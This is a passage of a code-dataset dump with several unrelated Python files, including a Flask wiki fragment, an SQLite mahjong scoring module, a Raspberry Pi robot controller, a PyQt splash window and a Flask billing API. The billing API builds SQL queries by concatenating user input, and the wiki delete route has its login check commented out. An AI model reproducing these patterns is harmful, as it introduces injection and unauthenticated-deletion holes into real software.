flask.Response(pgid)\n            return flask.redirect('/wiki/page/' + pgid)\n        except Exception as ex:\n            flask.abort(400, repr(ex))\n\n\n    # Wiki Delete Page\n    @app.route(URL_PREFIX_WIKI_WEB + '/api/del/<pgid>')\n    ##@index_utils.login_required\n    def wiki_api_del(pgid=None):\n        if not pgid:\n            return flask.redirect(flask.url_for('wiki_index'))\n\n        try:\n            pg = db_api.wiki_page_get(pgid)\n            pg.delete()\n            return flask.redirect(flask.url_for('wiki_index'))\n        except:\n            return flask.redirect(flask.url_for('wiki_index'))\n\n\n\n\n    # return the application at the end\n    return app\n\n\n# markdown functions #\n\n# http://pythonhosted.org/Markdown/reference.html\n\n# http://pythonhosted.org/Markdown/extensions/index.html\n# Officially Supported Extensions\n\n'''\nExtension Name\nExtra markdown.extensions.extra\n    Abbreviations markdown.extensions.abbr\n    Attribute Lists markdown.extensions.attr_list\n    Definition Lists markdown.extensions.def_list\n    Fenced Code Blocks markdown.extensions.fenced_code\n    Footnotes markdown.extensions.footnotes\n    Tables markdown.extensions.tables\n    Smart Strong markdown.extensions.smart_strong\nAdmonition markdown.extensions.admonition\nCodeHilite markdown.extensions.codehilite\nHeaderId markdown.extensions.headerid\nMeta-Data markdown.extensions.meta\nNew Line to Break markdown.extensions.nl2br\nSane Lists markdown.extensions.sane_lists\nSmartyPants markdown.extensions.smarty\nTable of Contents markdown.extensions.toc\nWikiLinks markdown.extensions.wikilinks\n'''\n\nWK_MARKDOWN_EXTENSIONS = [\n    'markdown.extensions.extra',\n    'markdown.extensions.abbr',\n    'markdown.extensions.attr_list',\n    'markdown.extensions.def_list',\n    'markdown.extensions.fenced_code',\n    'markdown.extensions.footnotes',\n    'markdown.extensions.tables',\n    'markdown.extensions.smart_strong',\n    'markdown.extensions.admonition',\n    'markdown.extensions.codehilite',\n    'markdown.extensions.headerid',\n    'markdown.extensions.meta',\n    'markdown.extensions.nl2br',\n    'markdown.extensions.sane_lists',\n    'markdown.extensions.smarty',\n    'markdown.extensions.toc',\n    'markdown.extensions.wikilinks',\n]\n\n\ndef wk_markdown_to_html(txt, *args, **kwargs):\n    html = markdown.markdown(txt, extensions=WK_MARKDOWN_EXTENSIONS)\n    html = wk_markdown_security_check(html)\n    return html\n\n\nWK_MARKDOWN_SEC_CHECKS = {\n    '\n').encode('utf-8'))\n    proc_ft.stdin.flush()\n    is_eol = False\n    word_list = []\n    vect_list = np.empty([0, 300])\n    while not is_eol:\n        l = proc_ft.stdout.readline().decode(\"utf-8\")\n        l = l.strip(' \\t\\n\\r')\n        is_eol = l.startswith('<%EOL%>')\n        if not is_eol:\n            lsplit = l.split(\" \")\n            word_list.append(lsplit[0])\n            snp = np.array(lsplit[1:])\n            fnp = snp.astype(np.float)\n            vect_list = np.vstack((vect_list, fnp))\n    print(word_list)\n    return word_list, vect_list\n\n\ndef main(argv=None):\n    x, y = preprocess()\n    print(\"Counts: x(rows, seg_max, embed_sz)=%s; y(rows, cols)=%s;\"%(x.shape, y.shape))\n    np.savez(FLAGS.data_file, x=x, y=y)\n\n\nif __name__ == '__main__':\n    tf.app.run()","sub_path":"vocab_process_ft.py","file_name":"vocab_process_ft.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"454017985","text":"#!/usr/bin/env python3\n\nimport warnings\nimport sqlite3\nimport random\nimport datetime\nimport re\nimport collections\nimport shutil\nimport os\n\nimport util\nimport settings\nimport leaderboard\n\nclass getCur():\n    con = None\n    cur = None\n    def __enter__(self):\n        self.con = sqlite3.connect(settings.DBFILE)\n        self.cur = 
self.con.cursor()\n        self.cur.execute(\"PRAGMA foreign_keys = 1;\")\n        return self.cur\n    def __exit__(self, type, value, traceback):\n        if self.cur and self.con and not value:\n            self.cur.close()\n            self.con.commit()\n            self.con.close()\n\n        return False\n\nschema = collections.OrderedDict({\n    'Players': [\n        'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n        'Name TEXT',\n        'MeetupName TEXT'\n    ],\n    'Scores': [\n        'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n        'GameId INTEGER',\n        'PlayerId INTEGER',\n        'Rank TINYINT',\n        'PlayerCount TINYINT',\n        'RawScore INTEGER',\n        'Score REAL',\n        'Date DATE',\n        'Chombos INTEGER',\n        'Quarter TEXT',\n        'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n    ],\n    'CurrentPlayers': [\n        'PlayerId INTEGER PRIMARY KEY',\n        'Priority TINYINT',\n        'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n    ],\n    'CurrentTables': [\n        'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n        'PlayerId INTEGER',\n        'FOREIGN KEY(PlayerId) REFERENCES Players(Id) ON DELETE CASCADE'\n    ],\n    'Users': [\n        'Id INTEGER PRIMARY KEY AUTOINCREMENT',\n        'Email TEXT NOT NULL',\n        'Password TEXT NOT NULL',\n        'UNIQUE(Email)'\n    ],\n    'Admins': [\n        'Id INTEGER PRIMARY KEY NOT NULL',\n        'FOREIGN KEY(Id) REFERENCES Users(Id) ON DELETE CASCADE'\n    ],\n    'ResetLinks': [\n        'Id CHAR(32) PRIMARY KEY NOT NULL',\n        'User INTEGER',\n        'Expires DATETIME',\n        'FOREIGN KEY(User) REFERENCES Users(Id)'\n    ],\n    'VerifyLinks': [\n        'Id CHAR(32) PRIMARY KEY NOT NULL',\n        'Email TEXT NOT NULL',\n        'Expires DATETIME'\n    ],\n    'Quarters': [\n        'Quarter TEXT PRIMARY KEY NOT NULL',\n        'GameCount INTEGER NOT NULL',\n        'UnusedPointsIncrement INTEGER DEFAULT 0'\n    ],\n    'Settings': [\n        'UserId INTEGER',\n        'Setting TEXT NOT NULL',\n        'Value SETTING NOT NULL',\n        'FOREIGN KEY(UserId) REFERENCES Users(Id)'\n    ],\n    'Timers': [\n        'Id INTEGER PRIMARY KEY',\n        'Name TEXT',\n        'Duration INTEGER',\n        'Time DATETIME'\n    ]\n})\n\ndef init(force=False):\n    warnings.filterwarnings('ignore', r'Table \\'[^\\']*\\' already exists')\n\n    global schema\n    independent_tables = []\n    dependent_tables = []\n    for table in schema:\n        if len(parent_tables(schema[table])) == 0:\n            independent_tables.append(table)\n        else:\n            dependent_tables.append(table)\n\n    to_check = collections.deque(independent_tables + dependent_tables)\n    checked = set()\n    max_count = len(independent_tables) + len(dependent_tables) ** 2 / 2\n    count = 0\n    while count < max_count and len(to_check) > 0:\n        table = to_check.popleft()\n        # If this table's parents haven't been checked yet, defer it\n        if set(parent_tables(schema[table])) - checked:\n            to_check.append(table)\n        else:\n            check_table_schema(table, force=force)\n            checked.add(table)\n        count += 1\n\ndef make_backup():\n    backupdb = datetime.datetime.now().strftime(settings.DBDATEFORMAT) + \"-\" + os.path.split(settings.DBFILE)[1]\n    backupdb = os.path.join(settings.DBBACKUPS, backupdb)\n    print(\"Making backup of database {0} to {1}\".format(settings.DBFILE, backupdb))\n    if not os.path.isdir(settings.DBBACKUPS):\n        os.mkdir(settings.DBBACKUPS)\n    shutil.copyfile(settings.DBFILE, backupdb)\n\nfkey_pattern = re.compile(\n    r'.*FOREIGN\\s+KEY\\s*\\((\\w+)\\)\\s*REFERENCES\\s+(\\w+)\\s*\\((\\w+)\\).*',\n    re.IGNORECASE)\n\ndef parent_tables(table_spec):\n    global fkey_pattern\n    parents = []\n    for spec in table_spec:\n        match = fkey_pattern.match(spec)\n        if match:\n            parents.append(match.group(2))\n    return parents\n\ndef check_table_schema(tablename, force=False, backupname=\"_backup\"):\n    \"\"\"Compare existing table schema with that specified in schema above\n    and make corrections as needed. 
This checks for new tables, new\n    fields, new (foreign key) constraints, and altered field specifications.\n    For schema changes beyond just adding fields, it renames the old table\n    to a \"backup\" table, and then copies its content into a freshly built\n    new version of the table.\n    For really complex schema changes, move the old database aside and\n    either build from scratch or manually alter it.\n    \"\"\"\n    table_fields = schema[tablename]\n    with getCur() as cur:\n        cur.execute(\"PRAGMA table_info('{0}')\".format(tablename))\n        actual_fields = cur.fetchall()\n        cur.execute(\"PRAGMA foreign_key_list('{0}')\".format(tablename))\n        actual_fkeys = cur.fetchall()\n        if len(actual_fields) == 0:\n            cur.execute(\"CREATE TABLE IF NOT EXISTS {0} ({1});\".format(\n                tablename, \", \".join(table_fields)))\n        else:\n            fields_to_add = missing_fields(table_fields, actual_fields)\n            fkeys_to_add = missing_constraints(table_fields, actual_fkeys)\n            altered = altered_fields(table_fields, actual_fields)\n            deleted = deleted_fields(table_fields, actual_fields)\n            if (len(fields_to_add) > 0 and len(fkeys_to_add) == 0 and\n                len(altered) == 0):\n                # Only new fields to add\n                if force or util.prompt(\n                        \"SCHEMA CHANGE: Add {0} to table {1}\".format(\n                            \", \".join(fields_to_add), tablename)):\n                    for field_spec in fields_to_add:\n                        cur.execute(\"ALTER TABLE {0} ADD COLUMN {1};\".format(\n                            tablename, field_spec))\n            elif len(fkeys_to_add) > 0 or len(altered) > 0:\n                # Fields have changed significantly; try copying old into new\n                if force or util.prompt(\n                        (\"SCHEMA CHANGE: Backup and recreate table {0} \"\n                         \"to add {1}, impose {2}, correct {3}, and delete {4}\").format(\n                             tablename, fields_to_add, fkeys_to_add,\n                             altered, deleted)):\n                    make_backup()\n                    backup = tablename + backupname\n                    sql = \"ALTER TABLE {0} RENAME TO {1};\".format(\n                        tablename, backup)\n                    cur.execute(sql)\n                    sql = \"CREATE TABLE {0} ({1});\".format(\n                        tablename, \", \".join(table_fields))\n                    cur.execute(sql)\n                    # Copy all actual fields that have a corresponding field\n                    # in the new schema\n                    common_fields = [\n                        f[1] for f in actual_fields if\n                        find_field_spec_for_pragma(table_fields, f)]\n                    sql = \"INSERT INTO {0} ({1}) SELECT {1} FROM {2};\".format(\n                        tablename, \", \".join(common_fields), backup)\n                    cur.execute(sql)\n                    sql = \"DROP TABLE {0};\".format(backup)\n                    cur.execute(sql)\n\ndef words(spec):\n    return re.findall(r'\\w+', spec)\n\ndef missing_fields(table_fields, actual_fields):\n    return [ field_spec for field_spec in table_fields if (\n        words(field_spec)[0].upper() not in [\n            'FOREIGN', 'CONSTRAINT', 'PRIMARY', 'UNIQUE', 'NOT',\n            'CHECK', 'DEFAULT', 'COLLATE'] + [\n            x[1].upper() for x in actual_fields]) ]\n\ndef missing_constraints(table_fields, actual_fkeys):\n    return [ field_spec for field_spec in table_fields if (\n        words(field_spec)[0].upper() in ['FOREIGN', 'CONSTRAINT'] and\n        'REFERENCES' in [ w.upper() for w in words(field_spec) ] and\n        not any(map(lambda fkey: match_constraint(field_spec, fkey),\n                    actual_fkeys))) ]\n\ndef match_constraint(field_spec, fkey_record):\n    global fkey_pattern\n    match = fkey_pattern.match(field_spec)\n    return (match and\n            match.group(1).upper() == fkey_record[3].upper() and\n            match.group(2).upper() == fkey_record[2].upper() and\n            match.group(3).upper() == fkey_record[4].upper())\n\nsqlite_pragma_columns = [\n    'column_ID', 'name', 'type', 'notnull', 'default', 'pk_member'\n]\n\ndef altered_fields(table_fields, actual_fields):\n    altered = []\n    for actual in actual_fields:\n        matching_spec = find_field_spec_for_pragma(table_fields, actual)\n        if 
matching_spec and not field_spec_matches_pragma(matching_spec, actual):\n altered.append(matching_spec)\n return altered\n\ndef deleted_fields(table_fields, actual_fields):\n deleted = []\n for actual in actual_fields:\n matching_spec = find_field_spec_for_pragma(table_fields, actual)\n if not matching_spec:\n deleted.append(actual[1] + ' ' + actual[2])\n return deleted\n\ndef find_field_spec_for_pragma(table_fields, pragma_rec):\n for field in table_fields:\n if words(field)[0].upper() == pragma_rec[1].upper():\n return field\n return None\n\ndef field_spec_matches_pragma(field_spec, pragma_rec):\n global sqlite_pragma_columns\n if field_spec is None or pragma_rec is None:\n return False\n field = dict(zip(\n sqlite_pragma_columns,\n [x.upper() if isinstance(x, str) else x for x in pragma_rec]))\n spec = words(field_spec.upper())\n return (spec[0] == field['name'] and\n all([w in spec for w in words(field['type'])]) and\n (field['notnull'] == 0 or ('NOT' in spec and 'NULL' in spec)) and\n (field['default'] is None or\n ('DEFAULT' in spec and str(field['default']) in spec)) and\n (field['pk_member'] == (\n 1 if 'PRIMARY' in spec and 'KEY' in spec else 0))\n )\n\ndef quarterString(time=None):\n \"\"\"Return the string for the calendar quarter for the given datetime object.\n Time defaults to current time\"\"\"\n if time is None:\n time = datetime.datetime.now()\n return time.strftime(\"%Y \") + [\"1st\", \"2nd\", \"3rd\", \"4th\"][\n (time.month - 1) // 3]\n\ndef unusedPointsIncrement(quarter=None):\n \"\"\"Get the UnusedPointsIncrement value for the given quarter.\n The quarter defaults to the most recent quarter in the database\n (but no later than today's date).\"\"\"\n if quarter is None:\n quarter = quarterString()\n try:\n with getCur() as cur:\n cur.execute(\"SELECT COALESCE(UnusedPointsIncrement,0) FROM Quarters\"\n \" WHERE Quarter <= ? ORDER BY Quarter DESC\"\n \" LIMIT 1\",\n (quarter,))\n increment = cur.fetchone()[0]\n except:\n increment = 0\n return increment\n\n_unusedPointsPlayer = None\nunusedPointsPlayerName = '!#*UnusedPointsPlayer*#!'\n\ndef getUnusedPointsPlayerID():\n \"\"\" Get the ID of the Players table entry that records unused points in\n games. If an entry doesn't exist, create one.\"\"\"\n global _unusedPointsPlayer, unusedPointsPlayerName\n if _unusedPointsPlayer:\n return _unusedPointsPlayer\n with getCur() as cur:\n cur.execute(\"SELECT Id from Players WHERE Name = ? AND\"\n \" MeetupName IS NULL\",\n (unusedPointsPlayerName,))\n result = cur.fetchall()\n if len(result) > 1:\n raise Exception(\"More than 1 player defined for unused points\")\n elif len(result) == 1:\n _unusedPointsPlayer = result[0][0]\n else:\n cur.execute(\"INSERT INTO Players (Name, MeetupName) VALUES (?, NULL)\",\n (unusedPointsPlayerName,))\n _unusedPointsPlayer = cur.lastrowid\n return _unusedPointsPlayer\n\ndateFormat = \"%Y-%m-%d\"\n\ndef addGame(scores, gamedate = None, gameid = None):\n \"\"\"Add raw scores for a particular game to the database.\n The scores should be a list of dictionaries.\n Each dictionary should have a 'player' name or ID, a raw 'score', and\n a 'chombos' count.\n One of the players may be the UnusedPointsPlayer to represent points\n that were not claimed at the end of play.\n The gamedate defaults to today. 
A new gameid is created if none is given.\n If a player name is not found in database, a new record is created for\n them.\n \"\"\"\n global dateFormat, unusedPointsPlayerName\n if gamedate is None:\n gamedate = datetime.datetime.now().strftime(dateFormat)\n quarter = quarterString()\n else:\n quarter = quarterString(datetime.datetime.strptime(gamedate, dateFormat))\n\n if scores is None:\n return {\"status\":1, \"error\":\"Please enter some scores\"}\n\n hasUnusedPoints = False\n unusedPoints = 0\n unusedPointsPlayerID = getUnusedPointsPlayerID()\n total = 0\n uniqueIDs = set()\n pointHistogram = {}\n for score in scores:\n uniqueIDs.add(score['player'])\n total += score['score']\n score['points'] = score['score'] - (\n settings.CHOMBOPENALTY * score['chombos'] * 1000)\n if score['player'] in (\n -1, unusedPointsPlayerID, unusedPointsPlayerName):\n score['player'] = unusedPointsPlayerID\n hasUnusedPoints = True\n unusedPoints = score['score']\n else:\n pointHistogram[score['points']] = (\n pointHistogram.get(score['points'], 0) + 1)\n\n realPlayerCount = len(scores) - (1 if hasUnusedPoints else 0)\n\n if not (4 <= realPlayerCount and realPlayerCount <= 5):\n return {\"status\":1, \"error\":\"Please enter 4 or 5 scores\"}\n\n if hasUnusedPoints and unusedPoints % unusedPointsIncrement() != 0:\n return {\"status\":1,\n \"error\":\"Unused points must be a multiple of {0}\".format(\n unusedPointsIncrement())}\n\n if \"\" in uniqueIDs:\n return {\"status\":1, \"error\":\"Please enter all player names\"}\n\n if len(uniqueIDs) < len(scores):\n return {\"status\":1, \"error\": \"All players must be distinct\"}\n\n targetTotal = realPlayerCount * settings.SCOREPERPLAYER\n if total != targetTotal:\n return {\"status\": 1,\n \"error\": \"Scores do not add up to \" + str(targetTotal)}\n\n # Sort scores for ranking, ensuring unused points player is last, if present\n scores.sort(\n key=lambda x: (x['player'] != unusedPointsPlayerID, x['points']),\n reverse=True)\n\n with getCur() as cur:\n if gameid is None:\n cur.execute(\"SELECT GameId FROM Scores ORDER BY GameId DESC LIMIT 1\")\n row = cur.fetchone()\n if row is not None:\n gameid = row[0] + 1\n else:\n gameid = 0\n else:\n cur.execute(\"DELETE FROM Scores WHERE GameId = ?\", (gameid,))\n\n umas = {4:[15,5,-5,-15],\n 5:[15,5,0,-5,-15]}\n rank = 1\n pointHistogram[None] = 0\n last_points = None\n for i in range(len(scores)):\n score = scores[i]\n if score['points'] != last_points:\n rank += pointHistogram[last_points]\n last_points = score['points']\n score['rank'] = rank\n uma = 0\n if score['player'] != unusedPointsPlayerID:\n for j in range(rank-1, rank-1 + pointHistogram[last_points]):\n uma += umas[realPlayerCount][j]\n uma /= pointHistogram[last_points]\n cur.execute(\"SELECT Id FROM Players WHERE Id = ? 
OR Name = ?\",\n (score['player'], score['player']))\n player = cur.fetchone()\n if player is None or len(player) == 0:\n cur.execute(\"INSERT INTO Players(Name) VALUES(?)\",\n (score['player'],))\n cur.execute(\"SELECT Id FROM Players WHERE Name = ?\",\n (score['player'],))\n player = cur.fetchone()\n player = player[0]\n\n adjscore = 0 if score['player'] == unusedPointsPlayerID else (\n (score['points'] - settings.SCOREPERPLAYER) / 1000.0 + uma)\n\n cur.execute(\n \"INSERT INTO Scores(GameId, PlayerId, Rank, PlayerCount, \"\n \" RawScore, Chombos, Score, Date, Quarter) \"\n \" VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)\",\n (gameid, player, score['rank'], len(scores),\n score['score'], score['chombos'], adjscore, gamedate, quarter))\n\n leaderboard.clearCache()\n return {\"status\":0}\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":16778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"453755340","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 03 16:14:55 2015\n\n@author: Flavian\n\"\"\"\n\nimport pygame\nfrom graphics import Graphics\nfrom pygame.locals import *\n\nclass Level:\n \n def __init__(self, art, level):\n self.art = art\n self.tiles = [[0 for j in range(30)] for i in range(40)]\n self.preload()\n self.load(level)\n \n def preload(self):\n self.black_tile = pygame.Surface((10, 10))\n g = Graphics(self.black_tile)\n g.setColor((0, 0, 0))\n g.fillRect(0, 0, 10, 10)\n \n def load(self, level):\n img = self.art.levels[level]\n pxarray = pygame.PixelArray(img.getSurface())\n for iX in range(0, 40):\n for iY in range(0, 30):\n c = pygame.Color(pxarray[iX, iY])\n alpha = c.r\n red = c.g\n green = c.b\n blue = c.a\n if red == 0 and green == 0 and blue == 0:\n self.tiles[iX][iY] = 0\n elif red == 255 and green == 255 and blue == 255:\n self.tiles[iX][iY] = 1\n elif red == 255 and green == 216 and blue == 0:\n print(\"Player spawn\")\n else:\n print(\"Unknow color (R:{0}, G:{1}, B:{2}, A:{3})\".format(red, green, blue, alpha))\n \n def tick(self, input_handler):\n i=0\n \n def render(self, g):\n for iX in range(0, 40):\n for iY in range(0, 30):\n tile = self.tiles[iX][iY]\n if tile == 0:\n g.drawImage(self.black_tile, iX * 10, iY * 10)\n elif tile == 1:\n g.drawImage(self.art.tiles[1][0].getSurface(), iX * 10, iY * 10)","sub_path":"Client/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"207928428","text":"import motors as m\n#import bump as b\nimport RPi.GPIO as GPIO\nimport time\n\nimport signal\n\ndef interrupted(signum, frame):\n print ('asdf')\nsignal.signal(signal.SIGALRM, interrupted)\n\ndef input():\n try:\n foo = raw_input()\n return foo\n except:\n return\n\nsignal.alarm(5)\ns = input()\nsignal.alarm(0)\n\nbump_sensor1 = 17\nbump_sensor2 = 4\nbump_sensor3 = 27\nbump_sensor4 = 22\n\nGPIO.setup(bump_sensor1, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor2, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor3, GPIO.IN, GPIO.PUD_DOWN)\nGPIO.setup(bump_sensor4, GPIO.IN, GPIO.PUD_DOWN)\n\ndef my_callback(bump_sensor1):\n m.stop()\n\nGPIO.add_event_detect(bump_sensor1, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor2, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor3, GPIO.RISING, callback=my_callback)\nGPIO.add_event_detect(bump_sensor4, GPIO.RISING, callback=my_callback)\n\nwhile (1):\n x = input() \n\n if x=='w':\n m.forward()\n 
elif x=='a':\n        m.left_turn()\n        time.sleep(0.1)\n        m.stop()\n    elif x=='aa':\n        m.left_turn()\n        time.sleep(0.4)\n        m.stop()\n    elif x=='d':\n        m.right_turn()\n        time.sleep(0.1)\n        m.stop()\n    elif x=='dd':\n        m.right_turn()\n        time.sleep(0.4)\n        m.stop()\n    elif x=='ss':\n        m.reverse()\n    elif x=='s':\n        m.stop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"33762354","text":"#-*- coding:utf-8 -*-\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtNetwork import *\nfrom uievents.awindowbase import *\nfrom uidefines.Ui_SplashWindow import *\nfrom uiutil.envs import *\nfrom uiutil.globaltool import *\nimport os\nimport sys\nimport pathlib\nimport datetime\n\n'''\n    Implementation class of the SplashWindow form\n'''\n#class FSplashWindow(IWindowImpl):\nclass FSplashWindow(IWindowImplM):\n    '''\n        Initialize all data (abstract method)\n    '''\n    def initUIAndData(self):\n        # initialize events\n        self.initEvents()\n        # initialize the message-dispatch worker thread\n        self.msgWorker = QTInvokeQueueWorkerWithProcess(self)\n        self.msgWorker.start()\n\n    '''\n        Initialize events\n    '''\n    def initEvents(self):\n        pass\n\n    '''\n        Return an instance of the UI definition class (e.g. an instance of uiDefines/Ui_MainWindow.py; abstract method)\n    '''\n    def getUIDefineObject(self):\n        return Ui_SplashWindow()\n\n    '''\n        Implementation of InvokeUI (for manipulating UI content across threads)\n    '''\n    def runUIImpl(self, uiArgs):\n        self.uiObj.lblContent.setText(uiArgs.contentVal)\n        self.uiObj.pbProgress.setValue(uiArgs.progressVal)\n\n    '''\n        Show the window\n    '''\n    def showWindow(title, doWorkImpl):\n        if doWorkImpl != None and title != None:\n            # show the window\n            windowObj, ui, event = WindowBuilder.buildWindow(None, FSplashWindow())\n            windowObj.setWindowTitle(title)\n            doWorkImpl.windowObj = windowObj\n            doWorkImpl.eventObj = event\n            windowObj.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)\n            windowObj.setFixedSize(windowObj.width(), windowObj.height())\n            windowObj.show()\n            # run the worker thread\n            thread = threading.Thread(target=doWorkImpl.process)\n            thread.start()\n\n'''\n    Splash worker class\n'''\nclass ISplashDoWork:\n    '''\n        Process the data\n    '''\n    def process(self):\n        raise NotImplementedError\n\n'''\n    Invoke arguments for Splash\n'''\nclass SplashInvokeArgs(QTInvokeArgs):\n    def __init__(self, progress, content):\n        super().__init__()\n        self.progressVal = progress\n        self.contentVal = content\n","sub_path":"uievents/eventsplashwindow.py","file_name":"eventsplashwindow.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"164176637","text":"import sys\nimport math\nimport re\nfrom typing import *\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**6)\n\n\nN = int(input())\ndata = [int(input()) for _ in range(N)]\ndata.sort()\nmpoint = 0\nwhile mpoint < len(data) and data[mpoint] <= 0:\n    mpoint += 1\n\nmArr = data[:mpoint]\npArr = data[mpoint:]\nans = 0\nwhile mArr:\n    if len(mArr) >= 2:\n        ans += (mArr[0]*mArr[1])\n        mArr = mArr[2:]\n    elif len(mArr) == 1:\n        ans += mArr[0]\n        mArr = mArr[1:]\n    else:\n        print(\"Error\")\npArr = pArr[::-1]\nwhile pArr:\n    if len(pArr) >= 2:\n        if pArr[0] == 1 or pArr[1] == 1:\n            ans += (pArr[0]+pArr[1])\n        else:\n            ans += (pArr[0]*pArr[1])\n        pArr = pArr[2:]\n    elif len(pArr) == 1:\n        ans += pArr[0]\n        pArr = pArr[1:]\n    else:\n        
print(\"Error\")\nprint(ans)\n\"\"\"\n4\n-1\n2\n1\n3\n\n4\n1\n2\n1\n3\n\n4\n-1\n-2\n-1\n-3\n\n6\n0\n-1\n-2\n-3\n4\n5\n\"\"\"\n","sub_path":"BOJ_Gold/1744.py","file_name":"1744.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574202016","text":"import os, pp\n\ninput_list = [4, 3, 8, 6, 10]\nresult_dict = {}\n\n\ndef fibo_task(value):\n a, b = 0, 1\n for item in range(value):\n a, b = b, a + b\n message = \"Fibbonachi calculeted by pip %d was %d\" % (os.getpid(), a)\n return (value, message)\n\n\ndef aggregate_resut(result):\n print(\"Done result with PIP [%d]\" % os.getpid())\n result_dict[result[0]] = result[1]\n\n\njob_server = pp.Server()\n\nfor item in input_list:\n job_server.submit(fibo_task, (item,), modules=('os',), callback=aggregate_resut)\n\njob_server.wait()\n\nprint(\"Main process PID [%d]\" % os.getpid())\nfor key, value in result_dict.items():\n print(\"For input %d, %s\" % (key, value))","sub_path":"ppalgo/parallel_algorithms/pp_fibo.py","file_name":"pp_fibo.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"33651001","text":"from flask import Flask, request, jsonify, Response ,send_from_directory , render_template ,json\nfrom openpyxl import Workbook , load_workbook\nfrom flask_cors import CORS, cross_origin\nfrom datetime import datetime\nimport mysql.connector\nimport xlsxwriter\nimport requests\nimport logging\nimport os.path\nimport json\nimport bill\nimport csv\n\n\n#ERROR CODES \n#(0) - SUCCESS\n#(-1) - 500 INTERNAL SERVER ERROR\n#(-2) - DATABASE CONNECTION ERROR (HTTP error 503 Service Unavailable)\n#(-3) - ERROR EXECUTING QUERY IN DATABASE\n#(-4) - I/O ERROR\n#(-5) - USER ERROR MISSING PARAMETER IN URL QUERY (HTTP error 400 Bad Request Error)\n\n\napp = Flask(__name__)\n\n# General setups and defenitions\nlogging.basicConfig(filename='app.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\ndef getMysqlConnection():\n return mysql.connector.connect(user='root', host='mysql', port='3306', password='root', database='billdb')\n\n@cross_origin()\n\n#---------------------------------------------------\n# START API ROUTES AND FUNCTIONS\n#---------------------------------------------------\n\n# Default page\n@app.route(\"/\")\ndef hello():\n return render_template('ProviderMainPage.html')\n\n# GET /health\n# - By default returns \"OK\" and status 200 OK\n# -If system depends on external resources (e.g. db), \n# and they are not available (e.g. \"select 1;\" fails ) \n# then it should return \"Failure\" and 500 Internal Server Error\n@app.route('/health', methods=['GET'])\ndef checkhealth():\n try:\n db = getMysqlConnection()\n except:\n return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n try:\n query = \"SELECT 1\"\n cur = db.cursor()\n cur.execute(query)\n result = cur.fetchall()\n logging.info('[GET][SUCCESS] health request . QUERY:' + query)\n return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" }) , 200 \n except Exception as e:\n logging.error('[GET][FAILURE] /health request . QUERY:' + query)\n return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n finally:\n logging.info(\"200 OK\")\n db.close()\n\n# POST /provider\n# Creates a new provider record:\n# - name - provider name. 
must be unique.\n# Returns a unique provider id as json: { \"id\": <id> }\n@app.route('/provider/<provider_name>', methods=['POST'])\ndef insert_provider(provider_name):\n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n\n    try:\n        query_string = \"INSERT INTO Provider (name) \"\n        query_string += \"SELECT * FROM (SELECT '\" + provider_name + \"') AS tmp \"\n        query_string += \"WHERE NOT EXISTS (\"\n        query_string += \"SELECT name FROM Provider WHERE name = '\" + provider_name + \"'\"\n        query_string += \") LIMIT 1;\"\n        cur = db.cursor() \n        cur.execute(query_string)\n        db.close()\n        logging.info(\"[POST][SUCCESS] provider/%s\", (provider_name,))\n        return jsonify({ \"errorCode\" : 0 , \"errorDescription\" : \"status 200 OK\" , \"result\": \"MYSQL query completed\"}) , 200\n    except Exception as e:\n        logging.error('[POST][FAILURE] while trying: %s', str(e))\n        return jsonify({ \"errorCode\" : -1 , \"errorDescription\" : \"500 Internal server error\" }) , 500 \n\n# PUT /provider/{id} can be used to update provider name \n@app.route('/provider', methods=['PUT'])\ndef putprovider():\n    try:\n        db = getMysqlConnection()\n    except:\n        return jsonify({ \"errorCode\" : -2 , \"errorDescription\" : \"ERROR ESTABLISHING A DATABASE CONNECTION\" }) , 503\n    try:\n        json = request.get_json()\n        id = str(json[\"id\"])\n        newname = str(json[\"newname\"])\n    except:\n        return jsonify({ \"errorCode\" : -5 , \"errorDescription\" : \"ERROR/WRONG NO PARAMETERS PASSED\" }) , 400\n    try: \n        cur = db.cursor() \n        cur.execute('UPDATE Provider SET name = ' + '\"' + str(newname)+ '\"' + ' WHERE id =' + id)\n    except:\n        return jsonify({ \"errorCode\" : -3 , 